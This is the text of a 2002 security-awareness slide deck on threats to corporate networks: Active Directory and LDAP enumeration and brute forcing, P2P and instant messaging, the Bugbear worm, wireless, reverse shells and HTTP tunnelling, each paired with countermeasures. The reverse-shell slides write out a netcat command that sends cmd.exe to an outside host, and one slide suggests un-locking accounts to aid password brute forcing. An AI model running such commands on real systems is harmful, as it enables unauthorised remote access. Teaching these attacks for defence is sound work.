Analysts International

Modern Threats to Information Infrastructure

V1.0 11-20-02

2

Introductions• Mark Lachniet from Analysts International,

Sequoia Services Group• Senior Security Engineer and Security

Services technical lead• Former I.S. director for Holt Public Schools • Certified Information Systems Security

Professional (CISSP)• Microsoft MCSE, Novell Master CNE, Linux

LPI Certified LPIC-1, Check Point Certified CCSE, TruSecure TICSA, etc.

3

Agenda• Windows 2000 Active Directory

• Peer to Peer file sharing

• Instant Messaging

• Bug Bear

• Wireless

• Reverse command shells

• HTTP Tunneling / GoToMyPC.com

• Round table – Q&A – Brainstorming

4

Active Directory Overview• Active directory is the directory service for Win2k

• NT 4.0 domains simply did not scale very well in large organizations, A.D. is distributed

• By default, all of the old NetBIOS stuff is still running, but there are new capabilities

• Improves management, especially with user and machine policies, delegation of authority functions, and integrated software such as Exchange

• Tight integration with DNS (Dynamic DNS)

• Tight integration with LDAP (Lightweight Directory Access Protocol)

• Integration with Kerberos (Authentication)

5

Hierarchical Directories

6

Pre-Win2k Compatibility Mode• Is required for a variety of backwards-compatibility

features• Is probably enabled in your environment unless you

are ALL Windows 2000• Allows access to all of the information you used to get

via NetBIOS (shares, users, etc.)• An Active Directory server will emulate a PDC for

Windows NT4 type environments and systems• If selected, the “everyone” group is given permissions

to read the directory, etc. (just like NT4) and hence anonymous access is allowed

• Will be required to interoperate with various products such as UNIX SAMBA, NT4.0 RAS servers, etc.

7

A.D. Default Configuration• Logging of A.D. activity is disabled by default• Also, authenticated users are able to enumerate

the entire directory• In a large company, you may wish to lock down

your directory so that users in an OU (such as engineering) cannot enumerate objects in another OU (such as internal auditing)

• For details on how to lock down this browsing of OU’s and A.D. information check out: www.microsoft.com/serviceproviders/deployment/ SP_AD_Architecture_Configuration.doc

8

A.D. and Security Policies• Although not discussed in this presentation,

A.D. is the means by which security policy is passed down to workstations and users

• Policies are based on domain, which may be an entire A.D. tree or just a sub-component (the relationship between A.D. and Domains may be murky at first glance)

• Lots of information is available on the Internet about the config and use of policies

• I suggest that you refer to the NSA security guides on this topic:http://www.nsa.gov/snac/index.html

9

Active Directory - LDAP• Based on the X.500 Directory Access Protocol, and is

similar to Novell NDS and other X.500 compliant directories in terms of naming conventions, etc.

• Win2k supports LDAP v2 and v3• Should be compatible with other LDAP implementations,

both server and client• Runs on TCP/389 (you should portscan your internal and

external network for this port)• Uses cleartext authentication by default• v3 support includes SASL (Simple Authentication Security

Layer) authentication which supports encryption through NTLM or Kerberos

• Many client applications that access LDAP stores for passwords can be forced to only use NTLM (this is a good idea)

10

LDAP Tricks – ADSI Edit• ADSI Edit allows raw access to the directory – this is

required for complicated operations but is also very dangerous

• Using the ADSI you can do a large variety of things in an “easy” way via scripting as well as the editor

• “Active Directory Service Interfaces (ADSI) enable systems administrators and developers of scripts or C/C++ applications to easily query for and manipulate directory service objects.”

• ADSI can access Active Directory, but lots of other handy stuff as well

• Extensive information on this at Microsoft’s Developer Network web site (MSDN)

11

LDAP Tricks – ADSI Scripting• ADSI supports many scripting capabilities:

– Enumerating objects, finding information– Adding users, creating custom objects (such as an

object that shows the time of last backup)– Finding users with specific criteria:

• Account disabled• Intruder lockout• Password not required• Password can’t change

– Also the ability to *SET* information• “un-lockout” an account (handy for brute forcing a

password on a specific account, isn’t it?)• Add/remove users from group (add as an admin, run a

command, remove user again!)

12

LDAP Brute Force Attacks• http://www.phenoelit.de/kold/download.html

• Specifically designed to attack LDAP, with support for Active Directory on Windows 2000

• Can be used to enumerate all ID’s found in the directory and brute force attack them with words from a dictionary file

• Can use an anonymous connection, or log in using a given user ID and password

• Account lockout / logging of LDAP attacks (brute force, etc) may be an issue that needs more research

• Phenoelit also has “lumberjack” which will do off-line hacking of LDAP directories (stored in LDIF format)

13

K0ld Screen Capture

14

Ldapminer.exe on Win2k• Allows full enumeration of the data contained

within LDAP (Active Directory)• Can dump all of the data discovered to a text

file for later analysis in ldif format (see last slide – lumberjack)

• Default Windows 2000 configuration will reveal some useful information:– Current system time– X.500 naming (may indicate corporate config)– DNS names and IP addresses (including internal)– If it is a global catalog (implies 1st AD server but

may have implications for Exchange or other penetration testing)

15

A.D. and L0phtCrack• L0phtCrack *will* work on Windows 2000 Active

Directory information• Uses PWDUMP3 to extract the hashes, as long as you

have admin access• Can access the hashes across the network, and may

not require physical access• All of your favorite auditing tricks should still work

fine with L0phtCrack, but you will need admin access• One significant change is that it is no longer possible

to steal the entire domain account list by booting to a floppy disk and grabbing the SAM file from the hard drive

• One trivia fact – did you know that L0phtCrack cannot crack high-bit characters (such as ALT-Keypad 0,1,2)

16

A.D. and Kerberos• Kerberos is the updated authentication system for

Windows 2000• Kerberos is an open standard, and other

implementations exist (and are somewhat compatible with Win2k)

• Windows 2000 clients will attempt to use Kerberos by default, and will downgrade to lesser authentication systems (such as NTLMv2) if there are problems

• In Kerberos, a “realm” is a logical network boundry, which correlates 1:1 with a Windows domain.

• This means that a Kerberos realm does not necessarily map to an Active Directory tree

• Be aware of this relationship, especially if you interoperate with UNIX systems, etc.

17

A.D. and Dynamic DNS• Windows Active Directory relies on Dynamic DNS• There is a logical link between DNS naming and the

directory structure• Windows 2000 clients will update their DNS name (e.g.

workstation.isaca.org) with their current IP address by means of the DHCP client service

• Dynamic DNS supports secure and insecure modes – if you rely on DNS naming for important security functions this should be researched

• Dynamic DNS is handy for auditors to find workstations in a DHCP environment, but it is also useful for hackers

• One personal observation is that the Dynamic DNS information is exposed in the LDAP directory, even to unauthenticated users.

• Also, keep in mind that DNS may allow for zone transfers, enumeration and other reconnaissance

18

Active Directory Auditing• You must manually enable logging and auditing

for Active directory• Enable auditing of all failed accesses of Active

Directory as well as logins, etc.• For very granular auditing (possibly through

scripts or for troubleshooting purposes) Use DSACLS and ACLDIAG

• DSACLS.EXE “facilitates management of access control lists (ACLs) for directory services. DsAcls enables you to query and manipulate security attributes on Active Directory objects. It is the command-line equivalent of the Security page on various Active Directory snap-in tools”

19

Active Directory Auditing• With ACLDIAG.EXE you can:• Compare the ACL on a directory services

object to the permissions defined in the schema defaults.

• Check or fix standard delegations performed using templates from the Delegation of Control wizard in the Active Directory Users and Computers snap-in, a Windows 2000 administrative tool.

• Get effective permissions granted to a specific user or group, or to all users and groups that show up in the ACL.

20

Theoretical Attacks on Active Directory

• According to the SANS writeup (see references), one dangerous possibility is embedding binary “blobs” in the directory that are executed by MMC

• Denial of Service – rapidly changing large numbers of objects, and then setting them as being high priority (critical) for replication

• Use of A.D. as Virus distribution system

• Modifying the schema in an inappropriate way

• Deeply nested OU objects?

• Mysterious problems – in testing, my LDAP server frequently froze up while using standard tools

21

Backing up Active Directory• In order to have AD security, you should make sure

that it is properly backed up

• Restoring AD can be challenging and complicated – make sure you have researched it before you tryBacking up the Active Directory also includes backing up system state

data files.

System state data files includes: – Active Directory

– Certificate services database (if a certificate server)

– Class registration (database of information about the component services)

– Cluster service (if installed)

– Performance counter configuration

– Registry

– Sysvol (shared folder that contains group policy templates, and login scripts)

– System startup files.

22

Active Directory References

• SecurityFocus article on A.D:

http://online.securityfocus.com/infocus/1292

http://online.securityfocus.com/infocus/1293

http://online.securityfocus.com/infocus/1470

http://online.securityfocus.com/infocus/1509

http://online.securityfocus.com/infocus/1535

• Preventing L0phtCrack attacks on A.D

http://rr.sans.org/win2000/l0phtcrack.php

23

More A.D. References• A comparison of NT4 domains and Win2k A.D.

http://www.microsoft.com/mspress/books/sampchap/3173.asp

• How to set up auditing of Active Directory:http://www.softheap.com/security/audit-active-directory-4.html

• Using LDP to find data in Active Directoryhttp://support.microsoft.com/default.aspx?scid=KB;en-

us;q224543

• Discussion on Pre-Windows 2000 Compatibility Mode:http://support.microsoft.com/default.aspx?scid=KB;en-

us;q257988

24

Peer to Peer File Sharing

• Several different networks and clients:• Aimster• FastTrack• iMesh• Audiogalaxy• MFTP • NeoModus • Gnutella• OpenNap

25

Peer to Peer File Sharing• The most popular network by far is Gnutella• Gnutella has many different clients including:

• BearShare*• Gnucleus • GTK-Gnutella • LimeWire • Mactella • Morpheus*• Phex • Qtella • Shareaza*• XoLoX

• Different clients have different features, systems and risks

26

P2P File Sharing History• Napster was the first successful and important

one, but napster made one mistake• Napster used centralized servers that were

under their control• Hence the system could be shut down by going

after Napster with legal action• Newer systems have “master” nodes, but all

they do is maintain lists of other peers out on the network

• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers

27

Napster-Style P2P

• This wasn’t too bad, at least you knew what to block

28

Gnutella Style P2P

• This is *bad* for you because there is no single choke point to cut off

29

P2P File Share Features• Keyword searching• Rate limiting / Quality of Service (via bandwidth

or simultaneous upload and download limits)• Request queuing at the serving host• Chat facilities• Use SHA hashes of files to uniquely ID:

– SHA hashes are unique by file– ID’s files that are the same but have different names– Allows for “swarm” downloads where parts of the same file are

downloaded from multiple sources simultaneously (cool)– Allows for file resumption if a source is unavailable (turned off,

hung up, etc.)– Allows for a patient person to get almost anything they can find

listed

30

Gnutella Communications• Uses 5 distinct types of protocol messages: ping, pong,

query, query reply, and push• Use Shareaza to get a good protocol analyzer / decoder

to see them• Ping and Pong discovery – ask who is out there, return

IP address and amount of shared files• Query and Query reply – gives search terms

(keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier

• Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall)

• The Push message is sent if the querier cannot connect to the server to download the data

31

Push – Firewall Circumvention• Sends the querier’s IP and port number and asks the

file host to push the file to it – this will bypass a single firewall in the mix

• If both parties are behind a firewall you are probably safe… For now…

• How can you stop it? Use a firewall to block *all* outgoing communications

• Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager)

• Its only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly”

• Can already be done with special (but thankfully complicated) HTTP tunneling software

• For Gnutella, you can block the “root” servers but an alternate could always be used

32

P2P File Share Security Risks• Spyware Spyware Spyware!• Usually no virus scanning is done – you need to do

your own• Spoofed servers will cough up Trojans for almost any

simple query (like the Benjamin Worm)• Sharing of more than you intended• “transit” sharing of naughty files has been hinted at!• Security holes (intentional or not) in the software

itself• Program minimizes (not shuts down) when exited• P2P specific worms (e.g. the “Gnutella Worm”)• Content problems and liability! • Bandwidth leeching

33

Future P2P Risks• A lot of things about P2P are “dicey” but haven’t yet

been exploited• For example, the GUID is a unique identifies that is

sometimes based on MAC address! (pre win2k it is said)

• That means that queries can possibly be tracked to a unique physical workstation

• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc)

• Great possibility for leveraging P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)

34

P2P “NG” Share Sniffer• Operates under the creed of “who needs

Napster when you have Windows”• Scans a subnet for “open” windows shares

and create a database of them• These open shares are then used as the

storage repositories for various types of files• This product used to be at sharesniffer.com

but is gone now. I wonder why• This was allegedly going to be a pay service! • Due the lack of awareness on the part of home

users, this will probably work quite well

35

Instant Messaging• IM is everywhere, including my cell phone!

(although I don’t use it)

• Over 81 MILLION users

• Check out:http://www.infosecuritymag.com/2002/aug/cover.shtml

• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.

• Specifically designed to get around firewalls in order to work

• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)

36

37

Problems with IM• Bypasses gateway AntiVirus products

• Typically unencrypted

• Security problems in the software itself -many previous hacks, probably many more to come

• May allow remote-control of machines inside the firewall

• Ability to send files, URLs, etc. to individuals

• Hard to stop at the firewall

• Hard to track, log and account for

• No robust authentication systems

• Secure IM costs $$ and may require an ongoing service contract or your own server

38

Instant Messaging ProblemsCase in Point - msgsnarf

• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff

• These are especially interesting because of their special features!

• One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing

• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)

• This might have a “white-hat” application, actually, if you need to monitor it

39

IM management Techniques• Use an IDS to alert you to matching traffic

(and then go gently inform the user)• Block access to the login servers and ports

(refer to infosecurity magazine’s August issue for details)

• Tightly control the workstation using imaging and desktop security products

• Require the use of proxy servers (only works in some cases – disable CONNECT on proxy)

• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software

40

Bug Bear• Known as W32.Bugbear or I-Worm.Tanatos• Some key subject lines:

– “bad new” – “Membership Confirmation”– “Market Update Report”– “Your Gift”

• Replicates through address book• Copies itself on available network shares

including printers! (if you see binary garbage on a printer, this may be a sign)

• Includes Trojan software:– Disable AntiVirus software– Built in key-logger– Back door software

41

Bug Bear• Exploits an OLD (may 16, 2001) bug in IE and

Outlook, addressed by MS01-027• Copies several files to the filesystem and then runs

them at each startup by modifying the registry• HKLM\Software\Microsoft\Windows\

CurrentVersion\RunOnce• Runs a keylogger that sends all of your keystrokes

(including passwords) to one of 22 different e-mail addresses

• Creates a trojan / backdoor that runs on port 36794 – might want to check FW logs for that

• Also has its own web server that it can start up remotely to abuse a system

42

Wireless• Yes, wireless is insecure…. Especially anything you

purchased less than 6 months ago and didn’t use another means of security (like a VPN)

• Until recently, the only security that you could get from the wireless Access Points (APs) was Wired Equivalency Protection (WEP)

• WEP comes in 64bit and 128bit security features, neither of which will do you any good at all if someone really wants to get you

• Newer products have much better security and support for better authentication systems (including bi-directional authentication to minimize the risk of “rogue” access points)

43

Wireless• Wardriving – people thing its fun, its cheap,

and in some cases a sport• Wireless leaks – connections can be made from

physical locations outside of your control by using special hardware and software

• Omnidirectional magnetic-mount antennas, directional antennas, and even pringles cans do a pretty good job of picking up signals you never thought possible

• Not only can anyone find your network, but they can (probably) tell what your SSID is, if you use WEP, and what vendor your equipment is

44

Wireless• Above and beyond that, modern software

integrates with a GPS over a serial port to record the longitude and latitude of your AP

• When posted on the internet, your dirty laundry is aired out for all to see

• Check out http://www.netstumbler.com for lots of great information

• Try it out yourself, you may be surprised• War driving is not, in itself, illegal! However,

if you ever use an AP without permission, that is over the line.

45

From Work to Home9 Access Points in 15 Minutes

46

Wireless Security Measures• There are many things you can do• Put access points on a special DMZ segment on a

firewall and restrict traffic• Require users to use a VPN client to access internal

resources• Use a modern authentication system such as 802.1X (in

Windows XP) and/or LEAP • These systems can require a successful authentication

(for example to a Radius server) before allowing a user to associate with an access point

• Can also require MUTUAL authentication between the AP and client in addition to user authentication

• If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP

47

Wireless Security Measures• Regularly scan and war-drive your own

facilities and companies• Consider tuning an IDS for wireless attack

signatures (there was a recent article on this)• Consider putting up a wireless honeypot

system• Consider using a wireless “flooding” system

that sends out huge quantities of random Access Point information to confuse (and delight) War Drivers

48

Reverse Command Shells• One would think that if you block all

incoming access, it should be impossible to access internal systems

• This is only partially true, because it assumes that the client is honest

• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded

• Reverse command shells, e.g. the NetCat attack are particularly scary

• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server

49

How Reverse Shells Work

• Imagine the above scenario. Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation but the client has Internet access

The Internet

Firewall

Client Workstation10.20.30.40

Hacker Workstationlachniet.com

Client Workstation10.20.30.50

Laser printer10.20.30.70

10.20.30.60

50

How Reverse Shells Work

The Internet

Firewall

Client Workstation10.20.30.40

Hacker Workstationlachniet.com

Client Workstation10.20.30.50

Laser printer10.20.30.70

10.20.30.60

LISTEN ON 8080!

Send cmd.exeto lachniet.com 8080

• Hacker runs NetCat in Listen mode on port 8080 on lachniet.com (netcat –l –p 8080)

• Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com 8080)

51

How Reverse Shells Work

• The result – full access as logged in user• To stop it – no outgoing access! • Except by proxy server

52

HTTP Tunneling• It used to be that a firewall, when properly

configured, would stop clients from doing naughty things (like reverse command shells)

• Ideally we would block all outgoing access, and allow only web access through a HTTP proxy server

• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model

• In this way, even the most paranoid countermeasures can be circumvented including a restrictive firewall and a proxy server

• Technically speaking, it looks something like this:

53

HTTP Tunneling in Practice

• Client wants to run a P2P file sharing client

• Dotted lines are HTTP traffic, Solid line is TCP

The Internet

Firewall

Proxy Server10.20.30.40

Hacker Workstationlachniet.com

Client Workstation10.20.30.50

Laser printer10.20.30.70

10.20.30.60

HTTP Tunnellistens ON 443SOCKS Serverlistens as well

Runs HTTP Tunnelclient and socks client

Gnutella Host

54

GoToMyPC.com• Basically the same thing, except you are using

a pay service for your HTTP tunnel termination

• The service also acts as a broker for who can connect to your PC

• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)

• You also get more control and presumably security through SSL, reporting, users and groups and such

55

HTTP Tunneling Counter-measures• Block *all* outgoing traffic at a firewall, and require all

traffic to go through a proxy server• Use a firewall with strict RFC compliance (I heard of some

reported success with Raptor/Symantec?)• Make sure your proxy server doesn’t allow the

CONNECT verb• Configure an IDS to sense certain types of HTTP

tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)

• Block all known destination servers such as those from the gotomypc.com service

• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself

• Log review may be your only recourse!

56

Q&A and Brainstorming

Mark Lachniet, Sr. Security EngineerCISSP, MCNE, MCSE, CCSE, LPIC-1, TICSAAnalysts International - Sequoia Services

3101 Technology Blvd. Suite ALansing, MI 48910

phone: 517.336.1004fax: 517.336.1004